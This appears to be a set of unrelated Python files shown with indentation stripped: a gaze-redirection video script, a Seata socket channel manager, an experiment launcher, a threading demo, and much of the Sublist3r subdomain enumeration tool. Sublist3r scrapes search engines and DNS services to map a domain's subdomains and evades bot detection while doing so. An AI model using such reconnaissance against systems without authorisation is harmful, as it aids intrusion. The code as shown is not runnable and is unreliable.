a_w2z_y = math.degrees(math.atan( (Pw[1]-self.Pe[1])/(Pw[2]-self.Pe[2])))
a_z2c_x = math.degrees(math.atan( (self.Pe[0]-self.Pc[0])/(self.Pc[2]-self.Pe[2])))
a_z2c_y = math.degrees(math.atan( (self.Pe[1]-self.Pc[1])/(self.Pc[2]-self.Pe[2])))
alpha = [int(a_w2z_y + a_z2c_y),int(a_w2z_x + a_z2c_x)] # (V,H)
return alpha, self.Pe, R_w
def flx_gaze(self, frame, gray, detections, shared_v, lock, pixel_cut=[3,4], size_I = [48,64]):
alpha_w2c = [0,0]
x_ratio = size_video[0]/self.size_df[0]
y_ratio = size_video[1]/self.size_df[1]
LE_M_A=[]
RE_M_A=[]
p_e=[0,0]
R_w=[0,0]
for k,bx in enumerate(detections):
# Get facial landmarks
time_start = time.time()
target_bx = dlib.rectangle(left=int(bx.left()*x_ratio),right =int(bx.right()*x_ratio),
top =int(bx.top()*y_ratio), bottom=int(bx.bottom()*y_ratio))
shape = self.predictor(gray, target_bx)
# get eye
LE_img, LE_M_A, LE_center, size_le_ori, R_le_LT = self.get_inputs(frame, shape, pos="L", size_I=size_I)
RE_img, RE_M_A, RE_center, size_re_ori, R_re_LT = self.get_inputs(frame, shape, pos="R", size_I=size_I)
# shifting angles estimator
alpha_w2c, p_e, R_w = self.shifting_angles_estimator(LE_center,RE_center,shared_v,lock)
time_get_eye = time.time() - time_start
# gaze manipulation
time_start = time.time()
# gaze redirection
# left Eye
LE_infer_img = self.L_sess.run(self.LE_img_pred, feed_dict= {
self.LE_input_img: np.expand_dims(LE_img, axis = 0),
self.LE_input_fp: np.expand_dims(LE_M_A, axis = 0),
self.LE_input_ang: np.expand_dims(alpha_w2c, axis = 0),
self.LE_phase_train: False
})
LE_infer = cv2.resize(LE_infer_img.reshape(size_I[0],size_I[1],3), (size_le_ori[1], size_le_ori[0]))
# right Eye
RE_infer_img = self.R_sess.run(self.RE_img_pred, feed_dict= {
self.RE_input_img: np.expand_dims(RE_img, axis = 0),
self.RE_input_fp: np.expand_dims(RE_M_A, axis = 0),
self.RE_input_ang: np.expand_dims(alpha_w2c, axis = 0),
self.RE_phase_train: False
})
RE_infer = cv2.resize(RE_infer_img.reshape(size_I[0],size_I[1],3), (size_re_ori[1], size_re_ori[0]))
# repace eyes
frame[(R_le_LT[0]+pixel_cut[0]):(R_le_LT[0]+size_le_ori[0]-pixel_cut[0]),
(R_le_LT[1]+pixel_cut[1]):(R_le_LT[1]+size_le_ori[1]-pixel_cut[1])] = LE_infer[pixel_cut[0]:(-1*pixel_cut[0]), pixel_cut[1]:-1*(pixel_cut[1])]*255
frame[(R_re_LT[0]+pixel_cut[0]):(R_re_LT[0]+size_re_ori[0]-pixel_cut[0]),
(R_re_LT[1]+pixel_cut[1]):(R_re_LT[1]+size_re_ori[1]-pixel_cut[1])] = RE_infer[pixel_cut[0]:(-1*pixel_cut[0]), pixel_cut[1]:-1*(pixel_cut[1])]*255
frame = self.monitor_para(frame, alpha_w2c, self.Pe, R_w)
result, imgencode = cv2.imencode('.jpg', frame, self.encode_param)
data = pickle.dumps(imgencode, 0)
self.client_socket.sendall(struct.pack("L", len(data)) + data)
return True
def redirect_gaze(self, frame,shared_v,lock):
# head detection
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_detect_gray = cv2.resize(gray,(self.size_df[0],self.size_df[1]))
detections = self.detector(face_detect_gray, 0)
rg_thread = Thread(target=self.flx_gaze, args=(frame, gray, detections,shared_v,lock))
rg_thread.start()
return True
def run(self,shared_v,lock):
# def main():
redir = False
size_window = [659,528]
vs = cv2.VideoCapture(1)
vs.set(3, size_video[0])
vs.set(4, size_video[1])
t = time.time()
cv2.namedWindow(conf.uid)
cv2.moveWindow(conf.uid, int(Rs[0]/2)-int(size_window[0]/2),int(Rs[1]/2)-int(size_window[1]/2));
while 1:
ret, recv_frame = vs.read()
if ret:
cv2.imshow(conf.uid,recv_frame)
if recv_frame is not None:
# redirected gaze
if redir:
frame = recv_frame.copy()
try:
tag = self.redirect_gaze(frame,shared_v,lock)
except:
pass
else:
result, imgencode = cv2.imencode('.jpg', recv_frame, self.encode_param)
data = pickle.dumps(imgencode, 0)
self.client_socket.sendall(struct.pack("L", len(data)) + data)
if (time.time() - t) > 1:
t = time.time()
k = cv2.waitKey(10)
if k == ord('q'):
data = pickle.dumps('stop')
self.client_socket.sendall(struct.pack("L", len(data))+data)
time.sleep(3)
cv2.destroyWindow(conf.uid)
self.client_socket.shutdown(socket.SHUT_RDWR)
self.client_socket.close()
vs.release()
self.L_sess.close()
self.R_sess.close()
break
elif k == ord('r'):
if redir:
redir = False
else:
redir = True
else:
pass
# In[ ]:
if __name__ == '__main__':
l = mp.Lock() # multi-process lock
v = mp.Array('i', [320,240]) # shared parameter
# start video receiver
# vs_thread = Thread(target=video_receiver, args=(conf.recver_port,))
vs_thread = mp.Process(target=video_receiver, args=(v,l))
vs_thread.start()
time.sleep(1)
gz_thread = mp.Process(target=gaze_redirection_system, args=(v,l))
gz_thread.start()
vs_thread.join()
gz_thread.join()
|
ChannelManager.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @author jsbxyyx
# @since 1.0
import queue
import selectors
import socket
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from loguru import logger
from seata.core.ByteBuffer import ByteBuffer
from seata.core.protocol.HeartbeatMessage import HeartbeatMessage
from seata.core.protocol.ProtocolConstants import ProtocolConstants
from seata.core.protocol.RpcMessage import RpcMessage
from seata.core.rpc.v1.ProtocolV1 import ProtocolV1
from seata.core.util.ClassUtil import ClassUtil
from seata.registry.Registry import RegistryFactory
class Channel:
def __init__(self, sock):
if not isinstance(sock, socket.socket):
raise TypeError('sock type error')
self.__sock = sock
self.__in_data = bytes()
self.__out_data = queue.Queue()
def get_sock(self):
return self.__sock
def append_in_data(self, data):
if not isinstance(data, bytes):
raise TypeError('append in data type error.' + type(data).__name__)
self.__in_data += data
def get_in_data(self):
return self.__in_data
def set_in_data(self, data):
if not isinstance(data, bytes):
raise TypeError('set data type error.' + type(data).__name__)
self.__in_data = data
def write(self, rpc_message):
if not isinstance(rpc_message, RpcMessage):
raise TypeError('channel write message type error.' + type(rpc_message).__name__)
self.__out_data.put_nowait(rpc_message)
def out_data_is_empty(self):
return self.__out_data.empty()
def poll_out_data(self):
return self.__out_data.get_nowait()
class ChannelManager:
def __init__(self, remote_client):
self.remote_client = remote_client
self.channels = {}
self.__sel = selectors.DefaultSelector()
self.protocol = ProtocolV1()
# TODO
self.executor = ThreadPoolExecutor(max_workers=16, thread_name_prefix="cm")
self.__boot = False
self.__cond = threading.Condition()
self.init()
def init(self):
threading.Thread(target=self.do_events, args=()).start()
threading.Thread(target=self.do_heart, args=()).start()
def acquire_channel(self, server_address):
if self.channels.get(server_address.to_string(), None) is not None:
return self.channels.get(server_address.to_string())
server_addr = (server_address.host, server_address.port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.connect_ex(server_addr)
events = selectors.EVENT_READ | selectors.EVENT_WRITE
channel = Channel(sock)
self.__sel.register(sock, events, data=channel)
self.channels[server_address.to_string()] = channel
return channel
def do_events(self):
try:
if sys.platform == 'win32' and not self.__boot:
try:
self.__cond.acquire()
self.__cond.wait()
finally:
self.__cond.release()
while True:
events = self.__sel.select()
if events:
for key, mask in events:
self.service_connection(key, mask)
except KeyboardInterrupt:
logger.error("caught keyboard interrupt, exiting")
finally:
self.__sel.close()
def service_connection(self, key, mask):
sock = key.fileobj
channel = key.data
if mask & selectors.EVENT_READ:
recv_data = sock.recv(4096)
if len(recv_data) > 0:
channel.append_in_data(recv_data)
if len(recv_data) < 7:
return
t_bb = ByteBuffer.wrap(bytearray(channel.get_in_data()))
magic = bytearray(len(ProtocolConstants.MAGIC_CODE_BYTES))
t_bb.get(magic)
if magic != ProtocolConstants.MAGIC_CODE_BYTES:
logger.error("magic not 0xdada", magic)
return
t_bb.get_int8()
full_length = t_bb.get_int32()
if len(channel.get_in_data()) >= full_length:
buf = channel.get_in_data()[0:full_length]
channel.set_in_data(channel.get_in_data()[full_length:])
in_message = self.protocol.decode(ByteBuffer.wrap(bytearray(buf)))
if not isinstance(in_message.body, HeartbeatMessage):
logger.debug('in message : <{}> request_id : {} sock : {}'.format(
ClassUtil.get_simple_name(in_message.body), in_message.id, sock.getpeername()))
self.executor.submit(self.remote_client.message_handler.process, in_message)
else:
logger.info('sock unregister...', sock.getpeername())
self.__sel.unregister(sock)
sock.close()
if mask & selectors.EVENT_WRITE:
while not channel.out_data_is_empty():
out_message = channel.poll_out_data()
if not isinstance(out_message.body, HeartbeatMessage):
logger.debug(
'out message : <{}> request_id : {} sock : {}'.format(
ClassUtil.get_simple_name(out_message.body), out_message.id, sock.getpeername()))
try:
sock.send(self.protocol.encode(out_message))
except ConnectionAbortedError as e:
logger.error(e)
def get_avail_list(self, tx_service_group):
avail_list = RegistryFactory.get_registry().lookup(tx_service_group)
return avail_list
def reconnect(self, tx_service_group):
avail_list = self.get_avail_list(tx_service_group)
if avail_list is None or len(avail_list) == 0:
registry = RegistryFactory.get_registry()
cluster_name = registry.get_service_group(tx_service_group)
if cluster_name is None or len(cluster_name.strip()) == 0:
logger.error(
'can not get cluster name in registry config [{}{}], please make sure registry config correct'.format(
'service.vgroupMapping.', tx_service_group))
return
from seata.registry.FileRegistry import FileRegistry
if not isinstance(registry, FileRegistry):
logger.error(
'no available service found in cluster [{}], please make sure registry config correct and keep your seata server running'.format(
cluster_name))
return
for address in avail_list:
self.acquire_channel(address)
if not self.__boot:
try:
self.__cond.acquire()
self.__boot = True
self.__cond.notify_all()
finally:
self.__cond.release()
def do_heart(self):
while True:
try:
logger.debug('do heart channel size : [{}]'.format(len(self.channels.values())))
for idx, channel in enumerate(self.channels.values()):
hb = HeartbeatMessage(True)
rpc_message = RpcMessage.build_request_message(hb, ProtocolConstants.MSGTYPE_HEARTBEAT_REQUEST)
channel.write(rpc_message)
except Exception as e:
logger.error('heart error', e)
finally:
try:
time.sleep(5)
except Exception:
pass
def get_channels(self):
if not self.__boot:
try:
self.__cond.acquire()
self.__cond.wait(15)
finally:
self.__cond.release()
return self.channels.values()
|
run_results.py
|
import numpy as np
import os
import copy
import threading
import argparse
from results import get_runs
##############################################
parser = argparse.ArgumentParser()
parser.add_argument('--print', type=int, default=0)
cmd_args = parser.parse_args()
##############################################
num_gpus = 4
counter = 0
def run_command(param):
global num_gpus, counter
if num_gpus == 0:
gpu = -1
else:
gpu = counter % num_gpus
counter = counter + 1
name = '%s_%f_%f_%s_%f_%f_%d_%d_%s' % (
param['benchmark'],
param['lr'],
param['eps'],
param['act'],
param['bias'],
param['dropout'],
param['dfa'],
param['sparse'],
param['init']
)
cmd = "python36 %s --gpu %d --epochs %d --batch_size %d --lr %f --eps %f --act %s --bias %f --dropout %f --dfa %d --sparse %d --rank %d --init %s --save %d --name %s" % (
param['benchmark'],
gpu,
param['epochs'],
param['batch_size'],
param['lr'],
param['eps'],
param['act'],
param['bias'],
param['dropout'],
param['dfa'],
param['sparse'],
param['rank'],
param['init'],
1,
name
)
if cmd_args.print:
print (cmd)
else:
os.system(cmd)
return
##############################################
runs = get_runs()
##############################################
num_runs = len(runs)
parallel_runs = num_gpus
for run in range(0, num_runs, parallel_runs):
threads = []
for parallel_run in range( min(parallel_runs, num_runs - run)):
args = runs[run + parallel_run]
t = threading.Thread(target=run_command, args=(args,))
threads.append(t)
t.start()
for t in threads:
t.join()
|
multi_threading.py
|
#-*- coding: utf-8 -*-
from threading import Thread
import time
def loop(idx, nsec):
print("start loop", idx, " at ", time.ctime())
time.sleep(nsec)
print("start loop", idx, " at ", time.ctime())
def main():
print("Process start at ", time.ctime())
thread0 = Thread(target=loop, args=(0, 4))
thread0.start()
thread1 = Thread(target=loop, args=(1, 2))
thread1.start()
thread0.join()
thread1.join()
print("Process done at ", time.ctime())
if "__main__" == __name__:
main()
|
sublist3r.py
|
#!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
# modules in standard library
import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
# external modules
from Sublist3r.subbrute import subbrute
import dns.resolver
import requests
# Python 2.x and 3.x compatiablity
if sys.version > '3':
import urllib.parse as urlparse
import urllib.parse as urllib
else:
import urlparse
import urllib
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith('win')
# Console Colors
if is_windows:
# Windows deserves coloring too :D
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
try:
import win_unicode_console , colorama
win_unicode_console.enable()
colorama.init()
#Now the unicode will work ^_^
except:
# print("[!] Error: Coloring libraries not installed, no coloring will be used [Check the readme]")
G = Y = B = R = W = G = Y = B = R = W = ''
pass
else:
G = '\033[92m' # green
Y = '\033[93m' # yellow
B = '\033[94m' # blue
R = '\033[91m' # red
W = '\033[0m' # white
def no_color():
global G, Y, B, R, W
G = Y = B = R = W = ''
def banner():
print("""%s
____ _ _ _ _ _____
/ ___| _ _| |__ | (_)___| |_|___ / _ __
\___ \| | | | '_ \| | / __| __| |_ \| '__|
___) | |_| | |_) | | \__ \ |_ ___) | |
|____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
# Coded By Ahmed Aboul-Ela - @aboul3la
""" % (R, W, Y))
def parser_error(errmsg):
banner()
print("Usage: python " + sys.argv[0] + " [Options] use -h for help")
print(R + "Error: " + errmsg + W)
sys.exit()
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(epilog='\tExample: \r\npython ' + sys.argv[0] + " -d google.com")
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument('-d', '--domain', help="Domain name to enumerate it's subdomains", required=True)
parser.add_argument('-b', '--bruteforce', help='Enable the subbrute bruteforce module', nargs='?', default=False)
parser.add_argument('-p', '--ports', help='Scan the found subdomains against specified tcp ports')
parser.add_argument('-v', '--verbose', help='Enable Verbosity and display results in realtime', nargs='?', default=False)
parser.add_argument('-t', '--threads', help='Number of threads to use for subbrute bruteforce', type=int, default=30)
parser.add_argument('-e', '--engines', help='Specify a comma-separated list of search engines')
parser.add_argument('-o', '--output', help='Save the results to text file')
parser.add_argument('-n', '--no-color', help='Output without color', default=False, action='store_true')
return parser.parse_args()
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
with open(str(filename), 'wt') as f:
for subdomain in subdomains:
f.write(subdomain + os.linesep)
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split('.')[::-1]
if parts[-1] == 'www':
return parts[:-1], 1
return parts, 0
class enumratorBase(object):
def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True):
subdomains = subdomains or []
self.domain = urlparse.urlparse(domain).netloc
self.session = requests.Session()
self.subdomains = []
self.timeout = 25
self.base_url = base_url
self.engine_name = engine_name
self.silent = silent
self.verbose = verbose
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
self.print_banner()
def print_(self, text):
if not self.silent:
print(text)
return
def print_banner(self):
""" subclass can override this if they want a fancy banner :)"""
self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
return
def send_req(self, query, page_no=1):
url = self.base_url.format(query=query, page_no=page_no)
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def get_response(self, response):
if response is None:
return "NULL"
return response.text if hasattr(response, "text") else response.content
def check_max_subdomains(self, count):
if self.MAX_DOMAINS == 0:
return False
return count >= self.MAX_DOMAINS
def check_max_pages(self, num):
if self.MAX_PAGES == 0:
return False
return num >= self.MAX_PAGES
# override
def extract_domains(self, resp):
""" chlid class should override this function """
return
# override
def check_response_errors(self, resp):
""" chlid class should override this function
The function should return True if there are no errors and False otherwise
"""
return True
def should_sleep(self):
"""Some enumrators require sleeping to avoid bot detections like Google enumerator"""
return
def generate_query(self):
""" chlid class should override this function """
return
def get_page(self, num):
""" chlid class that user different pagnation counter should override this function """
return num + 10
def enumerate(self, altquery=False):
flag = True
page_no = 0
prev_links = []
retries = 0
while flag:
query = self.generate_query()
count = query.count(self.domain) # finding the number of subdomains found so far
# if they we reached the maximum number of subdomains in search query
# then we should go over the pages
if self.check_max_subdomains(count):
page_no = self.get_page(page_no)
if self.check_max_pages(page_no): # maximum pages for Google to avoid getting blocked
return self.subdomains
resp = self.send_req(query, page_no)
# check if there is any error occured
if not self.check_response_errors(resp):
return self.subdomains
links = self.extract_domains(resp)
# if the previous page hyperlinks was the similar to the current one, then maybe we have reached the last page
if links == prev_links:
retries += 1
page_no = self.get_page(page_no)
# make another retry maybe it isn't the last page
if retries >= 3:
return self.subdomains
prev_links = links
self.should_sleep()
return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
def __init__(self, base_url, engine_name, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
enumratorBase.__init__(self, base_url, engine_name, domain, subdomains, silent=silent, verbose=verbose)
multiprocessing.Process.__init__(self)
self.q = q
return
def run(self):
domain_list = self.enumerate()
for domain in domain_list:
self.q.append(domain)
class GoogleEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
self.engine_name = "Google"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 200
super(GoogleEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<cite.*?>(.*?)<\/cite>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
link = re.sub('<span.*>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def check_response_errors(self, resp):
if (type(resp) is str) and 'Our systems have detected unusual traffic' in resp:
self.print_(R + "[!] Error: Google probably now is blocking our requests" + W)
self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
return False
return True
def should_sleep(self):
time.sleep(5)
return
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS - 2])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class YahooEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
self.engine_name = "Yahoo"
self.MAX_DOMAINS = 10
self.MAX_PAGES = 0
super(YahooEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
link_regx2 = re.compile('<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>')
link_regx = re.compile('<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>')
links_list = []
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub("<(\/)?b>", "", link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def should_sleep(self):
return
def get_page(self, num):
return num + 10
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -domain:www.{domain} -domain:{found}'
found = ' -domain:'.join(self.subdomains[:77])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain}".format(domain=self.domain)
return query
class AskEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination'
self.engine_name = "Ask"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
try:
links_list = link_regx.findall(resp)
for link in links_list:
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def get_page(self, num):
return num + 1
def generate_query(self):
if self.subdomains:
fmt = 'site:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class BingEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.bing.com/search?q={query}&go=Submit&first={page_no}'
self.engine_name = "Bing"
self.MAX_DOMAINS = 30
self.MAX_PAGES = 0
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent)
self.q = q
self.verbose = verbose
return
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
try:
links = link_regx.findall(resp)
links2 = link_regx2.findall(resp)
links_list = links + links2
for link in links_list:
link = re.sub('<(\/)?strong>|<span.*?>|<|>', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def generate_query(self):
if self.subdomains:
fmt = 'domain:{domain} -www.{domain} -{found}'
found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
query = fmt.format(domain=self.domain, found=found)
else:
query = "domain:{domain} -www.{domain}".format(domain=self.domain)
return query
class BaiduEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}'
self.engine_name = "Baidu"
self.MAX_DOMAINS = 2
self.MAX_PAGES = 760
enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.querydomain = self.domain
self.q = q
return
def extract_domains(self, resp):
links = list()
found_newdomain = False
subdomain_list = []
link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
try:
links = link_regx.findall(resp)
for link in links:
link = re.sub('<.*?>|>|<| ', '', link)
if not link.startswith('http'):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if subdomain.endswith(self.domain):
subdomain_list.append(subdomain)
if subdomain not in self.subdomains and subdomain != self.domain:
found_newdomain = True
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
if not found_newdomain and subdomain_list:
self.querydomain = self.findsubs(subdomain_list)
return links
def findsubs(self, subdomains):
count = Counter(subdomains)
subdomain1 = max(count, key=count.get)
count.pop(subdomain1, "None")
subdomain2 = max(count, key=count.get) if count else ''
return (subdomain1, subdomain2)
def check_response_errors(self, resp):
return True
def should_sleep(self):
time.sleep(random.randint(2, 5))
return
def generate_query(self):
if self.subdomains and self.querydomain != self.domain:
found = ' -site:'.join(self.querydomain)
query = "site:{domain} -site:www.{domain} -site:{found} ".format(domain=self.domain, found=found)
else:
query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
return query
class NetcraftEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
self.base_url = 'https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}'
self.engine_name = "Netcraft"
super(NetcraftEnum, self).__init__(self.base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.q = q
return
def req(self, url, cookies=None):
cookies = cookies or {}
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout, cookies=cookies)
except Exception as e:
self.print_(e)
resp = None
return resp
def should_sleep(self):
time.sleep(random.randint(1, 2))
return
def get_next(self, resp):
link_regx = re.compile('<a.*?href="(.*?)">Next Page')
link = link_regx.findall(resp)
url = 'http://searchdns.netcraft.com' + link[0]
return url
def create_cookies(self, cookie):
cookies = dict()
cookies_list = cookie[0:cookie.find(';')].split("=")
cookies[cookies_list[0]] = cookies_list[1]
# hashlib.sha1 requires utf-8 encoded str
cookies['netcraft_js_verification_response'] = hashlib.sha1(urllib.unquote(cookies_list[1]).encode('utf-8')).hexdigest()
return cookies
def get_cookies(self, headers):
if 'set-cookie' in headers:
cookies = self.create_cookies(headers['set-cookie'])
else:
cookies = {}
return cookies
def enumerate(self):
start_url = self.base_url.format(domain='example.com')
resp = self.req(start_url)
cookies = self.get_cookies(resp.headers)
url = self.base_url.format(domain=self.domain)
while True:
resp = self.get_response(self.req(url, cookies))
self.extract_domains(resp)
if 'Next Page' not in resp:
return self.subdomains
break
url = self.get_next(resp)
self.should_sleep()
def extract_domains(self, resp):
links_list = list()
link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
try:
links_list = link_regx.findall(resp)
for link in links_list:
subdomain = urlparse.urlparse(link).netloc
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
class DNSdumpster(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://dnsdumpster.com/'
self.live_subdomains = []
self.engine_name = "DNSdumpster"
self.q = q
self.lock = None
super(DNSdumpster, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def check_host(self, host):
is_valid = False
Resolver = dns.resolver.Resolver()
Resolver.nameservers = ['8.8.8.8', '8.8.4.4']
self.lock.acquire()
try:
ip = Resolver.query(host, 'A')[0].to_text()
if ip:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
is_valid = True
self.live_subdomains.append(host)
except:
pass
self.lock.release()
return is_valid
def req(self, req_method, url, params=None):
params = params or {}
headers = dict(self.headers)
headers['Referer'] = 'https://dnsdumpster.com'
try:
if req_method == 'GET':
resp = self.session.get(url, headers=headers, timeout=self.timeout)
else:
resp = self.session.post(url, data=params, headers=headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
def get_csrftoken(self, resp):
csrf_regex = re.compile('<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S)
token = csrf_regex.findall(resp)[0]
return token.strip()
def enumerate(self):
self.lock = threading.BoundedSemaphore(value=70)
resp = self.req('GET', self.base_url)
token = self.get_csrftoken(resp)
params = {'csrfmiddlewaretoken': token, 'targetip': self.domain}
post_resp = self.req('POST', self.base_url, params)
self.extract_domains(post_resp)
for subdomain in self.subdomains:
t = threading.Thread(target=self.check_host, args=(subdomain,))
t.start()
t.join()
return self.live_subdomains
def extract_domains(self, resp):
tbl_regex = re.compile('<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S)
link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
links = []
try:
results_tbl = tbl_regex.findall(resp)[0]
except IndexError:
results_tbl = ''
links_list = link_regex.findall(results_tbl)
links = list(set(links_list))
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
self.subdomains.append(subdomain.strip())
return links
class Virustotal(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.virustotal.com/ui/domains/{domain}/subdomains'
self.engine_name = "Virustotal"
self.q = q
super(Virustotal, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
self.url = self.base_url.format(domain=self.domain)
return
# the main send_req need to be rewritten
def send_req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
self.print_(e)
resp = None
return self.get_response(resp)
